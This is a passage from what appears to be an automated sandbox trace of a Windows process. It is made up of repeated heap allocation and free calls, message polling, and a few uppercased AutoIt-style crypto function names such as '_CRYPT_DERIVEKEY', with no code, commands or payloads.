1 [0036.975] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0036.975] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0036.975] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0036.975] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0036.975] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0036.975] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1670 | out: hHeap=0x770000) returned 1 [0036.975] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0036.975] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0036.975] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0036.975] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0036.975] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0036.975] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0036.975] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0036.975] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0036.975] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0036.975] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0036.975] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0036.975] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0036.976] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0036.976] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0036.976] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0036.976] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0036.976] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0036.976] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0036.976] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0036.976] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0036.976] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0036.976] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0036.976] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0036.976] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0036.976] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.976] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2c8 [0036.976] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0036.976] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0036.976] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0036.976] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0036.976] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0036.976] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0036.976] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae9a8 [0036.976] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0036.976] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0036.976] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0036.976] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae9a8 | out: hHeap=0x770000) returned 1 [0036.976] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0036.976] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0036.976] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2140 [0036.976] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.976] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0036.976] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0036.976] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0036.976] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.976] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0036.977] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0036.977] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da2c8 [0036.977] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0036.977] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0036.977] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0036.977] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0036.977] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0036.977] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0036.977] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889a90 [0036.977] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0036.977] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0036.977] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0036.977] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0036.977] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0036.977] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0036.977] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0036.977] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0036.977] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0036.977] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0036.977] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0036.977] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0036.977] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0036.977] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0036.977] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0036.977] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0036.977] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0036.977] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a30 | out: hHeap=0x770000) returned 1 [0036.977] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0036.977] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c10 | out: hHeap=0x770000) returned 1 [0036.977] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0036.977] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0036.977] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1670 | out: hHeap=0x770000) returned 1 [0036.978] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0036.978] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1918 | out: hHeap=0x770000) returned 1 [0036.978] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.978] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2140 | out: hHeap=0x770000) returned 1 [0036.978] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.978] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0036.978] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.978] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0036.978] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0036.978] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0036.978] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.978] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0036.978] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88caf0 [0036.978] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0036.978] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0036.978] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2c8 [0036.978] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0036.978] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2c8 [0036.978] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0036.978] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2c8 [0036.979] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0036.979] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0036.979] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0036.979] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0036.979] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.979] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2c8 [0036.979] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0036.979] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0036.979] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0036.979] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b15a8 | out: hHeap=0x770000) returned 1 [0036.979] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0036.979] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18a0 | out: hHeap=0x770000) returned 1 [0036.979] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0036.979] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0036.979] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da138 | out: hHeap=0x770000) returned 1 [0036.979] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a80 | out: hHeap=0x770000) returned 1 [0036.979] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0036.979] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0036.979] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0036.979] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0036.979] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0036.979] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0036.979] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0036.979] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0036.979] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0036.979] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0036.979] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0036.980] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0036.980] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1850 | out: hHeap=0x770000) returned 1 [0036.980] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0036.980] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.980] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0036.980] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.980] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0036.980] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0036.980] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0036.980] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0036.980] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0036.980] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0036.980] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2140 [0036.980] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.980] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0036.980] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0036.980] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0036.980] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0036.980] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.980] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0036.980] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0036.980] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da188 [0036.980] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0036.980] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0036.980] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0036.980] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0036.980] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da138 | out: hHeap=0x770000) returned 1 [0036.980] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da138 [0036.980] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0036.980] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0036.980] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0036.980] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cd00 [0036.981] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0036.981] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0036.981] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0036.981] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0036.981] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0036.981] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0036.981] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0036.981] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0036.981] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0036.981] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0036.981] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0036.981] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0036.981] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0036.981] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0036.981] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0036.981] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0036.981] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0036.981] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0036.981] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0036.981] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0036.981] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.981] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0036.981] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0036.981] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0036.981] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0036.981] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0036.981] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0036.981] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0036.981] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0036.981] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0036.981] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0036.982] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0036.982] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0036.982] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0036.982] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0036.982] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0036.982] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0036.982] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0036.982] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0036.982] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0036.982] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0036.982] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0036.982] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0036.982] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0036.982] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0036.982] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0036.982] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0036.982] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0036.982] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0036.982] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0036.982] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0036.982] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0036.982] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0036.982] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0036.982] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0036.982] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0036.982] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0036.982] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0036.982] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0036.982] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0036.982] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0036.982] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0036.983] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0036.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0036.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0036.983] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0036.983] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0036.983] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0036.983] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0036.983] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0036.983] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da308 [0036.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0036.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0036.983] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.983] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0036.983] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0036.983] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0036.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, 